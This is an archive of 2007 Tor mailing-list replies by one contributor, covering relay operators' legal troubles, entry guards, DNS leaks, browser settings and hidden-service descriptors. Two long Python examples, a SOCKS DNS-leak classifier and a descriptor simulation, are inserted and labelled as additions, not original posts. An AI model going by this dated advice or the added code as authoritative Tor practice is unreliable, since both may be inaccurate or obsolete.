way of incorporating/associating ourselves? What sort of insurance could such 
an organization arrange? How could we do all this without turning the network 
into some kind of cadre?

Yours from the moral high ground, ;)
Robert







Re: court trial against me -

2007-11-14 Thread Robert Hogan
On Wednesday 14 November 2007 20:22:09 TOR Admin (gpfTOR1) wrote:
 Hi Mirko,

 1: by German law a Tor node admin is something like an access provider.
 You are not responsible for your traffic. If the court have only an IP
 address and you have a tor status log, they have nothing.

 2: Tor is a legal service in Germany (today and yesterday, tomorrow we
 will see). If you provided only a legal service, it is no way to
 construct a case of aiding and abetting and you are not a disquieter or
 something like that.

 3: Maybe there is a judge who does not know these facts. The law depends not
 only on one judge. Don't give up.

 4: You need help. Try to contact the following organizations:

   - AK Vorratsdatenspeicherung (data retention free contact form ;-) at
 http://www.vorratsdatenspeicherung.de/content/view/70/82/lang,de/ )

   - German Privacy Foundation e.V i.Gr. (data retention free contact
 form at http://www.privacyfoundation.de/index.php?id=36 )

   - Humanistische Union e.V. (They have lawyers by training and they are
 interested in TOR.)

   - Chaos Computer Club,
   - Heise Verlag, try to contact the journalist H. Bleich

 By the way (for other admins), it is not a good solution, to ignore the
 first letter. Go to the visit and explain, what you have done and what
 you have not done.


This is all excellent advice, and it is characteristic of the level of 
solidarity and helpfulness regularly displayed by Tor operators on this list.

But it underlines the fact that a Tor operator in need is always:

1. In need of concrete, immediate help. Guaranteed. 
2. Completely on their own. 

The second point can't be emphasized enough. Nothing we say on this list can 
help with the legal bills or demonstrate physical solidarity in court. Mirko 
is a tor server operator. There are hundreds of us. But that judge and 
prosecutor looked around the court and thought to themselves, 'If this Tor is 
so legit, where's your backup Mirko?'

The fact that Mirko waited until the case was done and dusted before reporting 
in shows us all the problem we have. We *expect* to be cut loose.

We are a single-issue, special interest group. Mirko shouldn't have to go 
begging to a bunch of tangentially-interested organizations looking for a 
sympathetic ear. He should be able to come to us and we, as a group, should 
be able to cover some of his legal costs and access to a specialist lawyer. 
We should have had representation in that court blasting the prosecutor back 
to conveyancing cases. Simple as that. Unless we can do that as a body, we 
are all fucked as individuals. Period.

If you want to know my suggestion for remedying this situation:

http://archives.seul.org/or/talk/Nov-2007/msg00144.html

I would give time and money to such an organization. So let's get some sound 
advice from each other and set one up.










Re: court trial against me - the outcome

2007-11-14 Thread Robert Hogan
On Wednesday 14 November 2007 20:47:50 you wrote:

 This country needs a revolution!


Maybe! ;) 

In the meantime, solidarity among Tor operators would go a long way. If that 
case had been for 100,000 euro you might now find yourself with a date in 
court. Who would you turn to in such a situation?

We need to create a body that we can all turn to, and only we as a group can 
create it. Would you be willing to contribute time to creating such an 
organization? Do you have any contacts who could advise on how to establish 
it? 

If so, let me know. And apologies in advance for contacting you directly if it 
is unwelcome.








Re: first hop to entry node, encrypted? sorry for trivial question

2007-11-06 Thread Robert Hogan
On Tuesday 06 November 2007 16:47:15 Jefferson Iblis wrote:
 On Nov 6, 2007 8:55 AM, Florian Reitmeir [EMAIL PROTECTED] wrote:
  Hi,
 
  On Tue, 06 Nov 2007, Jefferson Iblis wrote:
   I've heard variously that Tor does encrypt my communications with my
   entry node, and also that it does not. Which is true?
 
  Communication between:
  Your Host - Tor Entry Node
  is encrypted

 Thanks. Then I'm a little perplexed about why it's preferable to use a
 limited number of entry guards to avoid traffic analysis.


Because it reduces the chances of you happening upon someone who owns both the 
entry and the exit node on your circuit. If someone owns both they can 
perform a bit of timing analysis and figure out who you are and where you're 
going.

See this thread 

http://archives.seul.org/or/talk/Dec-2006/msg2.html

particularly this mail

http://archives.seul.org/or/talk/Dec-2006/msg7.html

for what can happen if the same guy owns all three nodes.


 If the connection between me and the entry guard is encrypted, and all
 I'm telling the entry guard is please pass this encrypted stream to
 next specified tor server, what is the danger? Can the entry guard
 see my traffic, or do they just see another layer of encryption?

Just another layer of encryption. They can't 'read your traffic'.




Re: Insecure Privoxy Configuration in Vidalia Bundles Prior to 0.1.2.18

2007-10-31 Thread Robert Hogan
On Wednesday 31 October 2007 15:34:18 Gregory Fleischer (Lists) wrote:
 Versions of the Vidalia bundle prior to 0.1.2.18 install Privoxy with
 an insecure configuration file.  Both Windows and Mac OS X versions
 are affected.  The installed 'config.txt' file ('config' on Mac OS X)
 had the following option values set to 1:

- enable-remote-toggle
- enable-edit-actions

snip

 In order to allow time for people to upgrade, additional attack
 details and sample code will be withheld for a couple of days.

TorK is affected by this too. There should be a 0.22 available before Friday.




Re: Setting up a private tor network

2007-10-22 Thread Robert Hogan

 I was also setting up my own Tor network based on the instructions in
 the FAQ, but I've been trying to reproduce it as a virtual network
 running a number of User Mode Linux
 based virtual machines on one PC. It is available as a Netkit
 laboratory; I think it is quite easy to install and run, so if you want
 to experiment, let me know and I send it to you.

I think everyone on the list would be interested. Can you send a link?

If it's not *too* big I can mirror it.





Re: Library Defeats Tor Followup Addl Info

2007-10-16 Thread Robert Hogan
On Monday 15 October 2007 23:58:37 [EMAIL PROTECTED] wrote:
shnip
 
  well then explain to me how they can monitor dns traffic if all dns
  requests are made within the originating client box and not to any
  outside source. maybe all you tor gurus can explain how clients usually
  make dns requests through tor and WHY IT IS THAT TOR ALLOWS COMPUTERS TO
  LEAK DNS REQUESTS AT ALL TOR SOFTWARE SHOULD NOT ALLOW THIS AND
  SHOULD FAIL TO WORK IF DNS REQUESTS ARE MADE TO ANY NODE OTHER THAN TOR
  THROUGH PRIVOXY. OH THAT'S RIGHT TOR IS EXPERIMENTAL AND NOT FOR
  GENERAL USE. FUNNY HOW LONG IT HAS BEEN EXPERIMENTAL. MAYBE THE FAULT
  HERE IS WITH TOR, NOT WITH ME OR THE LIBRARY?
 
shnip

Whether a dns request gets routed through privoxy (or any other privacy proxy 
you use) and then tor depends on the system call the application uses to 
perform the request.

The problem is that some applications perform system calls that by-pass their 
own proxy settings. This is more by happenstance than design. It's important 
for Tor users to know how to guard against this and even prevent it and the 
tor devs have put a lot of work into making it easier for tor's helper 
applications to do so.

It sounds like in your situation some windows equivalent of a kernel module is 
hooking system calls like dns requests and doing something funky with them, 
the result being that DNS requests that would get routed to Tor on a normal 
installation are being forwarded to a big display board in the staff common 
room or whatever.

Tor can't manage and inspect your system the way you would like it to. Other 
apps have to help it do this. For browsing purposes, on an OS that you can't 
control and don't own, the only real solution may be something like janusvm 
or a livecd like incognito.

Hope this helps, and apologies if I'm repeating stuff elsewhere in the thread 
or have misunderstood your query. 
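
The point above about the lookup depending on which call the application makes, as an added example (not part of the original post and not Tor's or Privoxy's code): a proxy-side check that parses a client's SOCKS request and reports whether it carried a hostname, so resolution happens behind the proxy, or an address the application had already resolved locally. The sample byte strings, names and addresses are constructed for illustration.

```python
import ipaddress
import struct

# Added illustration: classify SOCKS4/4a/5 CONNECT requests by whether the
# client sent a hostname or an address it had already resolved itself.


def _is_ip_literal(name):
    try:
        ipaddress.ip_address(name)
        return True
    except ValueError:
        return False


def _result(version, target, port, resolved_locally):
    return {"version": version, "target": target, "port": port,
            "resolved_locally": resolved_locally}


def _parse_socks4(data):
    # VN(1) CD(1) DSTPORT(2) DSTIP(4) USERID... NUL [HOSTNAME... NUL]
    if len(data) < 9:
        raise ValueError("truncated SOCKS4 request")
    port = struct.unpack("!H", data[2:4])[0]
    ip = data[4:8]
    user_end = data.index(b"\x00", 8)  # ValueError if the terminator is missing
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:
        # SOCKS4a: the 0.0.0.x marker means a hostname follows the user id.
        host_end = data.index(b"\x00", user_end + 1)
        host = data[user_end + 1:host_end].decode("ascii")
        return _result("4a", host, port, _is_ip_literal(host))
    return _result("4", str(ipaddress.IPv4Address(ip)), port, True)


def _parse_socks5(data):
    # VER(1) CMD(1) RSV(1) ATYP(1) DST.ADDR(variable) DST.PORT(2)
    if len(data) < 5 or data[2] != 0:
        raise ValueError("not a SOCKS5 request message")
    atyp = data[3]
    if atyp == 1:      # IPv4 address: the name was resolved before the proxy
        host, rest, local = str(ipaddress.IPv4Address(data[4:8])), data[8:], True
    elif atyp == 4:    # IPv6 address: same situation
        host, rest, local = str(ipaddress.IPv6Address(data[4:20])), data[20:], True
    elif atyp == 3:    # length-prefixed domain name: the proxy side resolves it
        n = data[4]
        host, rest = data[5:5 + n].decode("ascii"), data[5 + n:]
        if len(host) != n:
            raise ValueError("truncated hostname")
        # An IP literal passed in the name field was still resolved locally.
        local = _is_ip_literal(host)
    else:
        raise ValueError("unknown SOCKS5 address type %d" % atyp)
    if len(rest) < 2:
        raise ValueError("truncated SOCKS5 request")
    return _result("5", host, struct.unpack("!H", rest[:2])[0], local)


def classify_socks_request(data):
    """Parse one SOCKS request (for SOCKS5: the message after method negotiation)."""
    if not data:
        raise ValueError("empty request")
    if data[0] == 4:
        return _parse_socks4(data)
    if data[0] == 5:
        return _parse_socks5(data)
    raise ValueError("not a SOCKS request")


# Constructed sample requests (192.0.2.10 is a documentation address).
SAMPLES = {
    "socks5-hostname": b"\x05\x01\x00\x03" + bytes([11]) + b"example.com"
                       + struct.pack("!H", 80),
    "socks5-ipv4": b"\x05\x01\x00\x01" + bytes([192, 0, 2, 10])
                   + struct.pack("!H", 80),
    "socks5-ip-as-name": b"\x05\x01\x00\x03" + bytes([10]) + b"192.0.2.10"
                         + struct.pack("!H", 80),
    "socks4-ip": b"\x04\x01" + struct.pack("!H", 443) + bytes([192, 0, 2, 10])
                 + b"\x00",
    "socks4a-hostname": b"\x04\x01" + struct.pack("!H", 443) + b"\x00\x00\x00\x01"
                        + b"\x00" + b"example.com\x00",
}


def leaking_clients(samples):
    """Names of the samples whose lookup happened before the proxy saw them."""
    return sorted(name for name, raw in samples.items()
                  if classify_socks_request(raw)["resolved_locally"])


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, classify_socks_request(raw))
    print("resolved locally:", leaking_clients(SAMPLES))
```
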







Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)

2007-10-15 Thread Robert Hogan
On Sunday 14 October 2007 19:50:38 [EMAIL PROTECTED] wrote:
 On Sat, Oct 13, 2007 at 09:21:40AM +0100, [EMAIL PROTECTED] wrote 0.9K bytes in 30 lines about:
 : Do:
 : Spoof user-agent (is this necessary even with javascript disabled?)
 : (browser)

 Arguably, unless you're using BobnJoe's browser, any of the popular ones
 should provide sufficient numbers (firefox, safari, opera, ie).

konqueror, a bobnjoe browser if ever there was one, can only turn off sending 
the user-agent and spoof it for selected websites. it doesn't even support 
regexes.

 : Spoof http-headers as though a US english browser (browser/privacy
 : proxy?)

 Only if you want to appear as coming from the US, and if you read
 English.  If you're in UAE and spoofing US English, then you may stand
 out for being different.


But no-one should know you're in the UAE because you're using tor. Or have I 
missed your point?

 : Do not:
 : Use tabs (enforced/recommended by controller?)

 Why?

 : Keep the browser open when finished 'using tor' (enforced/recommended by
 : controller?)

 If your browser properly cleans up and you've disabled everything,
 chances are this isn't that big of a deal.

for both, javascript timers apparently. a separate browser or open-and-close 
browser session seems to be the thing.




Re: magic Wednesday

2007-10-15 Thread Robert Hogan
On Saturday 13 October 2007 23:56:57 Roger Dingledine wrote:
 On Thu, Jul 12, 2007 at 08:22:45PM +0200, Olaf Selke wrote:
shnip

 So what's happening is that on the first morning at 6am, your Tor server
 is getting a hup signal, which causes it to publish a new descriptor
 and reset its 18 hour counter -- meaning it won't publish again until
 6+18=midnight. So now it's in a cycle where it tries to publish twice
 a day: once at midnight, and once at 6am.


Just to clarify for anyone else scratching their heads: it's publishing at 6am 
every day because the server has a cron job that hups the server every day at 
that time. The hup wasn't a one off but a daily thing, which is standard in 
the tor debian package.






Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)

2007-10-13 Thread Robert Hogan
On Friday 12 October 2007 00:26:46 [EMAIL PROTECTED] wrote:
 On Thu, Oct 11, 2007 at 08:57:48PM +0100, [EMAIL PROTECTED] wrote 1.1K bytes in 29 lines about:
 : Keeping track of all the things you should turn off or get a proxy to
 : tweak makes my feeble head hurt.

 The latest torbutton-dev releases handle most of this for you.

So for any browser without torbutton the list of things to do while using tor 
is:

Turn off:
Javascript (browser)
Java (browser)
Plugins (browser)
Cookies (browser)
Referer Headers (privacy proxy)
Caching (browser)
History reads/writes (browser)

Do:
Spoof user-agent (is this necessary even with javascript disabled?) (browser)
Spoof http-headers as though a US english browser (browser/privacy proxy?)

Do not:
Use tabs (enforced/recommended by controller?)
Keep the browser open when finished 'using tor' (enforced/recommended by 
controller?)

Anything to add/remove/clarify?



Tor Defcon Talks

2007-10-13 Thread Robert Hogan

The defcon videos are up. 

This is Roger's:

http://video.google.com/videoplay?docid=-9081582671026610093&q=defcon+roysac.com+dingledine&total=1&start=0&num=10&so=0&type=search&plindex=0

You can view Nick's and Mike's by changing dingledine to mathewson and perry 
respectively in the search box.

Are there any other tor-related ones?




Re: funneling a wireless net's outbound connections through tor

2007-10-01 Thread Robert Hogan
On Monday 01 October 2007 16:35:29 Mike Cardwell wrote:

 If you use Tor, you considerably increase the number and range of people
 that could potentially attack you. You also make yourself a tastier target.

 This is not a bad thing if you know how to deal with it. It *is* a bad
 thing if you don't. For example, I have only ever had attempted MITM
 attacks against my ssh sessions when using them over Tor.


I think torifying a user's traffic without informing him of it is a very bad 
idea. Pop3 is the best example. I don't think anyone with all the facts to 
hand would ever use a pop3 session over Tor. Whatever the merits of the 
well-you-go-over-x-hops-anyway argument (and it generally does not apply to 
pop3), tor is always x-hops + 1, and that '+ 1' could be anyone from Aunt 
Nellie to the NSA, no special privileges required.

This is one of the main challenges faced by Live CDs and other Torified 
environments - is it better to anonymize everything in the session or always 
prevent the likes of pop3 from being anonymized, ever?




Re: Set up a webproxy to TOR - tor-proxy.net

2007-09-24 Thread Robert Hogan
On Monday 24 September 2007 02:22:34 Ricky Fitz wrote:
 On Sunday, 23.09.2007, 20:50 -0400, [EMAIL PROTECTED] wrote:
  On Mon, Sep 24, 2007 at 12:42:31AM +0200, Ricky Fitz wrote:
   It is running on the same server my TOR-Server is running (called
   GrossATuin).
 
  Does your proxy use a separate Tor client, do you exclude your node as
  as an entry?

 No, it does not use a separate Tor-Client. Therefore it doesn't make
 sense to exclude my node. It uses the Tor-Session which runs as a
 tor-node. So if you spy on the traffic of the server, you will not be
 able to see, which traffic is from routing traffic for acting as a
 server, and which from acting as a client. I think that's safer than
 using a second client.


So is your cgi-proxy routing everything to an instance of privoxy/polipo 
running on your machine or directly to the tor socks port? 

If it is routing everything to privoxy/polipo, what configuration are you 
using?

I think it is this sort of detail that phobos has in mind.


  I was wondering recently about the security implications of such a setup.
 
  I was thinking of using a vpn to access my Tor server. From there, all
  vpn traffic would be proxied through another tor instance running in
  client mode with no bw limitations. Would that be more secure because a
  tor server is already running there or less secure because, if in some
  way, the traffic from the two instances could be differentiated and the
  vpn connections would make the whole system less secure because they
  would allow timing and statistical attacks relating vpn traffic to the
  second tor traffic?

 I really don't know, if it will be possible to identify the
 vpn-connection because of the data which is transferred. But it would be
 possible, to see that there is another service running than tor. Also,
 what Bluestar is doubled. If we build a VPN from my server to yours, not
 only me is theoretical able to spy on the traffic, but also you. (Not
 that I want to say I do not trust you, but it kills the advantages of
 onion-system.


I think the answer is 'less secure'. That vpn link to bluestar88 is used only 
by you and it contains all your anonymous traffic on one little pipe over the 
internet. Unless the link is padded to camouflage inactivity that has to make 
things easier for an observer.


-- 

Browse Anonymously Anywhere - http://anonymityanywhere.com
TorK- KDE Anonymity Manager - http://tork.sf.net
KlamAV  - KDE Anti-Virus- http://www.klamav.net



Re: Load Balancing

2007-09-22 Thread Robert Hogan
On Friday 21 September 2007 19:34:09 Alexander W. Janssen wrote:
 On 9/21/07, Arrakis [EMAIL PROTECTED] wrote:
  Hey guys, quick question.
 
  If I have Tor process running, and request a url that has 10 images to
  load from the same domain, do all the requests go through the same
  circuit, or does the tor process split up the requests across all the
  circuits?

 Interesting question. From what I understood a new circuit is created
 for every TCP-connection. If your browser grabs, for instance, 6
 images at the same time (6 loading instances == connections), Tor
 should open 6 different circuits.

 However, considering your question... It doesn't sound too efficient
 to me... The slides say If the user wants to access a different site,
 Alice's Tor client selects a different path.
 I'm curious how strict I should read that...

 Site vs. TCP-connections?

 Alex.

The original question is answered later in the thread, but there is an 
interesting distinction between polipo and privoxy in the way this situation 
is handled:

- privoxy will use new streams on the same circuit for each of the images
- polipo will generally pipeline everything over the same stream

I believe this results in a perceptible performance improvement for general 
browsing. Someone please correct me if I've got this wrong, because I'm just 
working from observation.

-- 

Browse Anonymously Anywhere - http://anonymityanywhere.com
TorK- KDE Anonymity Manager - http://tork.sf.net
KlamAV  - KDE Anti-Virus- http://www.klamav.net



Re: Exclude nodes from certain countries

2007-09-16 Thread Robert Hogan
On Friday 14 September 2007 18:27:21 misc wrote:
 I'm using Tor on windows

 I prefer to avoid tor nodes from certain countries. I know that I can
 manually add nodes into ExcludeNodes setting in Tor Config.

 However there are over hundred different Tor nodes in one country I want to
 exclude. And they're constantly changing (new ones pop up, old ones
 disappear, etc). It's impossible to do such a task manually using
 ExcludeNodes setting.

 Didn't anybody find a better way?

TorK allows you to do this (in a rough and ready way using the geoip database 
(maxmind.com) - about 9x% accurate). TorK is available only for Linux/BSD 
unfortunately, but you could use the Incognito LiveCD which uses TorK as 
the default Tor interface.

http://www.patdouble.com/index.php?option=com_content&task=view&id=11&Itemid=18
http://files1.cjb.net/incognito

-- 

Browse Anonymously Anywhere - http://anonymityanywhere.com
TorK- KDE Anonymity Manager - http://tork.sf.net
KlamAV  - KDE Anti-Virus- http://www.klamav.net





Re: ATTN: An attack on my torrc? I did not specify a server or an exit node!!!

2007-09-15 Thread Robert Hogan
On Saturday 15 September 2007 20:20:32 jeffery statin wrote:
 This was in my message log today and I did not specify
 a server or an exit node (if that is what using exit
 refers to).  Hell, I just re-installed this Windows XP
 SP2 and just installed the Tor bundle (Tor v.0.1.2.17,
 Vidalia v0.0.14).  I haven't even opened the torrc or
 torrc.orig.1 before I noticed this warning!

The warnings are nothing to worry about. 


 Sep 15 10:03:58.640 [Notice] We tried for 15 seconds
 to connect to '[scrubbed]' using exit 'ZoneSecurite'.
 Retrying on a new circuit.

Tor/Vidalia created this circuit automatically and chose the exit randomly.

 Sep 15 11:49:32.906 [Warning] You specified a server
 mono by name, but this name is not registered, so it
 could be used by any server, not just the one you
 meant. To make sure you get the same server in the
 future, refer to it by key, as
 $B468125D79F3C03491EB95FD8126981E5348D88C.


Vidalia probably requested information from Tor for 'mono' by 'name' rather 
than 'fingerprint'. Again, this is not anything to worry about. Just the 
normal operation of your tor/vidalia bundle.





Re: Proposal of a new hidden wiki

2007-08-09 Thread Robert Hogan
On Wednesday 08 August 2007 22:59:56 Ringo Kamens wrote:
 It's not the issue of a great wall attack where a person can't
 access a public wiki with onion links, it's an issue of whether that
 wiki could even exist. You'd have to be crazy to host that on a public
 machine.
 Comrade Ringo Kamens


You mean like these crazee boyz?

http://eng.anarchopedia.org/Tor_network_links

This is a useful link, could someone add it to the neat links section?





Re: Proposal of a new hidden wiki

2007-08-08 Thread Robert Hogan
On Wednesday 08 August 2007 19:32:39 Ringo Kamens wrote:
 I'm interested in testing this out with somebody. Until then, can any
 devs/tor hackers enlighten us as to what would determine which host
 gets picked? Would it be whoever is the fewest hops away? If so, one
 host would get the most traffic if it was consistently closest to fast
 servers.
 Comrade Ringo Kamens


The spec says:

  Upon receiving a descriptor, the directory server checks the signature,
   and discards the descriptor if the signature does not match the enclosed
   public key.  Next, the directory server checks the timestamp.  If the
   timestamp is more than 24 hours in the past or more than 1 hour in the
   future, or the directory server already has a newer descriptor with the
   same public key, the server discards the descriptor.  Otherwise, the
   server discards any older descriptors with the same public key and
   version format, and associates the new descriptor with the public key.
   The directory server remembers this descriptor for at least 24 hours
   after its timestamp.  At least every 18 hours, Bob's OP uploads a
   fresh descriptor.

So if a number of servers shared the same hidden-service key they would just 
overwrite each other's descriptor with each upload. They would never 
co-exist, instead the most recent poster would get the traffic. 

It seems like it should work as long as the servers agreed to update at 
different times. Not sure how secure such a service would be though.


-- 

Browse Anonymously Anywhere - http://anonymityanywhere.com
TorK- KDE Anonymity Manager - http://tork.sf.net
KlamAV  - KDE Anti-Virus- http://www.klamav.net
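
The directory-server rules quoted from the spec in the message above, as an added example (not from the original post or from Tor's source): a small in-memory model of the accept/discard logic, run against two machines that share one hidden-service key. The `signature_ok` flag stands in for real signature verification, and the host names, key label and upload schedule are constructed assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

MAX_PAST = timedelta(hours=24)    # "more than 24 hours in the past"
MAX_FUTURE = timedelta(hours=1)   # "more than 1 hour in the future"


@dataclass(frozen=True)
class Descriptor:
    public_key: str             # label standing in for the service's public key
    version: int
    timestamp: datetime
    intro_points: tuple         # which machine's introduction points it lists
    signature_ok: bool = True   # assumption: replaces real signature checking


class DirectoryServer:
    """Model of the descriptor handling described in the quoted spec text."""

    def __init__(self):
        self._by_key = {}       # public_key -> {version: Descriptor}

    def upload(self, desc, now):
        if not desc.signature_ok:
            return "discarded: bad signature"
        if desc.timestamp < now - MAX_PAST:
            return "discarded: timestamp too old"
        if desc.timestamp > now + MAX_FUTURE:
            return "discarded: timestamp in the future"
        stored = self._by_key.setdefault(desc.public_key, {})
        # A newer descriptor for the same key wins, whoever uploaded it.
        if any(d.timestamp > desc.timestamp for d in stored.values()):
            return "discarded: newer descriptor already held"
        # Otherwise the older one for this key and version is replaced.
        stored[desc.version] = desc
        return "accepted"

    def lookup(self, public_key, version=0):
        # Expiry is not modelled: the spec only says "at least 24 hours".
        return self._by_key.get(public_key, {}).get(version)


T0 = datetime(2007, 8, 8, 0, 0, tzinfo=timezone.utc)   # constructed start time

# Constructed schedule: (upload hour, descriptor timestamp hour, uploading host)
SCHEDULE = [
    (0, 0, "host-A"),
    (9, 9, "host-B"),
    (18, 18, "host-A"),
    (20, 10, "host-B"),   # an older descriptor arriving late
    (27, 27, "host-B"),
    (28, 30, "host-A"),   # uploader's clock is two hours fast
]


def simulate_shared_key():
    """Return (hour, uploader, verdict, whose intro points clients now get)."""
    directory = DirectoryServer()
    log = []
    for upload_h, stamp_h, host in SCHEDULE:
        desc = Descriptor("shared-key", 0, T0 + timedelta(hours=stamp_h),
                          (host + "-intro",))
        verdict = directory.upload(desc, now=T0 + timedelta(hours=upload_h))
        serving = directory.lookup("shared-key").intro_points[0]
        log.append((upload_h, host, verdict, serving))
    return log


if __name__ == "__main__":
    for row in simulate_shared_key():
        print("t+%02dh %-7s %-42s -> %s" % row)
```

Only one descriptor per key is ever held, so the machine whose accepted descriptor carries the latest timestamp receives all lookups until another upload displaces it.
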





Re: Directory servers for a subset of Tor routers

2007-08-05 Thread Robert Hogan
On Sunday 05 August 2007 20:13:14 Silviu Udrea wrote:
 Can i configure TOR to use it with some code so i can choose which exit
 node i want? Something like this:

 TOR_exit_nodes[10];

 for( i=0; i<10; i++ )
 {

 retrieve_webpage( URL, TOR_exit_nodes[ i ] );

 }
 This code should rotate 10 TOR_exit_nodes to retrieve some webpages with
 PHP or JavaScript.



You can view google using baobab as an exit with the following url:

http://www.google.com.baobab.exit


That means you can do something like:

 TOR_exit_nodes[10];

 for( i=0; i<10; i++ )
 {

 retrieve_webpage( URL + "." + TOR_exit_nodes[ i ] + ".exit" );

 }




Re: bandwidth graph ok with 0.1.2.14-dev only

2007-08-01 Thread Robert Hogan
On Wednesday 01 August 2007 09:19:46 Olaf Selke wrote:
 Hello,

 my OR still periodically shows up a 24 hours sawtooth bandwidth
 utilization using 0.1.2.15. Regarding the dropping bandwidth every night
 GMT+2 it behaves exactly like 0.1.2.14. I supposed this issue to be
 fixed with 0.1.2.14-dev since the bandwidth utilization with
 0.1.2.14-dev doesn't change very much over the day.


I've done some light research on this issue and suspect (on the basis of 
fairly slender analysis) that the problem may not be entirely down to just 
the version of Tor you're using. The only way to see if it is a factor is to 
run 0.1.2.14-dev for a while and see if the problem re-appears after a week 
or two. Would you mind doing that?


 Is there any special code introduced in 0.1.2.14-dev fixing this issue
 and has been removed again in 0.1.2.15? For the time being I think I'll
 stick to 0.1.2.14-dev.


Could you state the exact svn revision you're using at the moment? There's no 
exact release called 0.1.2.14-dev, svn stable branch was given this version 
name on the 13th July so I'm assuming you're using a particular svn revision 
from r10822 onwards, sometime between 13th July and 17th July.  You can find 
out the revision by doing an 'svn info' in the tor svn dir.


-- 

Browse Anonymously Anywhere - http://anonymityanywhere.com
TorK- KDE Anonymity Manager - http://tork.sf.net
KlamAV  - KDE Anti-Virus- http://www.klamav.net



Re: Blocking child pornography exits

2007-07-22 Thread Robert Hogan
On Sunday 22 July 2007 05:58:23 Ron Wireman wrote:
 Unfortunately, this 'separation of concerns' you're a proponent of doesn't
 work in the real world.  In the same way that you can't insert a piece of
 metal into someone with a high calibre rifle without grievously injuring
 then, you can't run a completely open anonymous router network without
 being a conduit for child abuse and other evils.  For any action, there may
 be many possible results, and it seems to me that if one of the evils is
 overwhelming, it is artificially hedging the issue to say you have no
 responsibility for it.  If tor can't be designed in a way that strongly
 discourages or prevents people from using it for evil, it shouldn't exist.

To pick up on your analogy, what you are asking for here is a gun that cannot 
shoot innocent people. And if you can't make a gun that only kills people who 
deserve it then guns shouldn't exist.

We all know that weapons (and you can include Tor and the cryptography that 
underlies Tor in that category) can be used for evil ends [1]. They provide 
security and can guarantee freedom, but some asshole is always going to use 
them to do something horrible and make us wonder why we ever invented them in 
the first place.

But a little reflection makes us realize that assholes and murder existed long 
before the first high calibre rifle, and in fact the high calibre rifle gives 
us all a better chance of defeating the assholes in the long run, 
particularly if they're bigger than us and trying to get into our house. 

Child pornographers and their ilk remind us that privacy, like true freedom of 
speech, is not an unmitigated blessing but a necessary evil. A bank can 
secure your bill payment from prying eyes with SSL, so a criminal can do the 
same with his obscene images. No one is suggesting that SSL develop obscene 
image filters. The assholes can use SSL/PGP/Tor as much as we do but because 
these tools protect our privacy we *all* can use them to protect ourselves 
from even bigger assholes than child pornographers.


[1] Most cryptography is classified as a munition in the US and subject to the 
same  export controls.

-- 

Browse Anonymously Anywhere - http://anonymityanywhere.com
TorK- KDE Anonymity Manager - http://tork.sf.net
KlamAV  - KDE Anti-Virus- http://www.klamav.net



Re: magic Wednesday

2007-07-17 Thread Robert Hogan
On Tuesday 17 July 2007 21:17:50 Olaf Selke wrote:
 Robert Hogan wrote:
  Just looking at a few days in June for blutmagie, it seems to disappear
  off the radar shortly after teatime most days, then reappears some time
  after midnight. Eerily human behaviour, at least by Irish standards.

 last Saturday I upgraded from version 0.1.2.14 to 0.1.2.14-dev. Now the
 traffic distribution over the day looks more reasonable. Maybe it was a
 software issue with 0.1.2.14. Of course a three day statistic doesn't
 prove anything. Attached you'll find my last 24h traffic stats.

 Keep you posted...

 regards, Olaf

http://anonymityanywhere.com/blutmagie/blutmagie.txt

shows your listing history over june and july on moria1, one of the main dir 
authorities.

Delisting of blutmagie is shown where there is no information beyond the first 
sixty characters or so.

If you look at the date/time column to the right you'll see that interruptions 
to your listing tend to occur where ~24 hours have been left between updates 
to your server's descriptor, e.g. caused by your onion key rotating. 

Your listing has completely recovered since you updated a few days ago - you 
also changed your server's identity at the same time by the looks of it.

If you still have your logs from the affected times, can you see if there are 
any reports there of failing to upload your new router descriptor to the 
authorities?

I want to do a bit more searching to see if the rut your server got into 
(updating its descriptor at practically the same time every day) is normal 
behaviour or not. 

-- 

Browse Anonymously Anywhere - http://anonymityanywhere.com
TorK- KDE Anonymity Manager - http://tork.sf.net
KlamAV  - KDE Anti-Virus- http://www.klamav.net



Re: New Torbutton (1.1.4-alpha)

2007-07-11 Thread Robert Hogan
On Monday 09 July 2007 10:16:55 Mike Perry wrote:
 Feedback, suggestions, and comments are welcome. Especially if someone
 could point out what I'm doing wrong with the OpenSearch Google search
 plugin installations (which are somewhat unrelated, but I figured were
 worth putting up there, since a major usability complaint is Why do I
 get the damn German/Chinese/etc Google with Tor?).

Stop me if this has been suggested before, but would it be worth introducing 
an unofficial URI for hidden services that would make them recognisable to 
the likes of torbutton? The idea being that the user could 'enable tor' 
simply by clicking on a hidden service link rather than the usual jig of 
click-servernotfound-back-scratchhead-enabletor-clickagain.

Is this possible with a firefox plugin or would it be necessary to get the 
firefox developers on board?

It is already possible with konqueror/kde thanks to kioslaves (tork implements 
a tor: 'URI' that does just this). 

-- 

Browse Anonymously Anywhere - http://anonymityanywhere.com
TorK- KDE Anonymity Manager - http://tork.sf.net
KlamAV  - KDE Anti-Virus- http://www.klamav.net



Re: New Torbutton (1.1.4-alpha)

2007-07-11 Thread Robert Hogan
On Wednesday 11 July 2007 10:10:36 Mike Perry wrote:
. Changing tor
 state automatically makes me a little nervous, even if it is only in
 the Tor Enabled direction..


If torbutton could request a yes/no response from the user in such situations 
that would be nice.


-- 

Browse Anonymously Anywhere - http://anonymityanywhere.com
TorK- KDE Anonymity Manager - http://tork.sf.net
KlamAV  - KDE Anti-Virus- http://www.klamav.net



Re: End of ROCKate soon

2007-07-10 Thread Robert Hogan
On Tuesday 10 July 2007 05:48:39 Benjamin Schieder wrote:
 On 09.07.2007 10:42:34, Bill Weiss wrote:
  Benjamin Schieder([EMAIL PROTECTED])@Fri, Jul 06, 2007 at 07:10:54PM +0200:
   On 06.07.2007 12:01:06, Arrakis wrote:
Benjamin,
   
Sorry to hear you won't be keeping up on the ROCKate and
have been forced to succumb to Germany's turn. I expect
more such tor-related shutdowns among fear and legislation.
I'll be picking up the slack shortly, so no worries.
A development release of xB Machine will be available
August 3rd. It will likely be hosted from Germany, but
I think we will stand the heat. If Germany doesn't like
it we will host it elsewhere. If you want, we could probably
host it for you, but I don't know how much you want
it still available, if Germany will punish you for it.
  
   I'd be really happy if someone can host it outside Germany. I don't
   think they can sue me because I did the work before the law passed.
 
  What are the bandwidth/month requirements?  I might be able to do it off
  of my Tor server without too much pain.

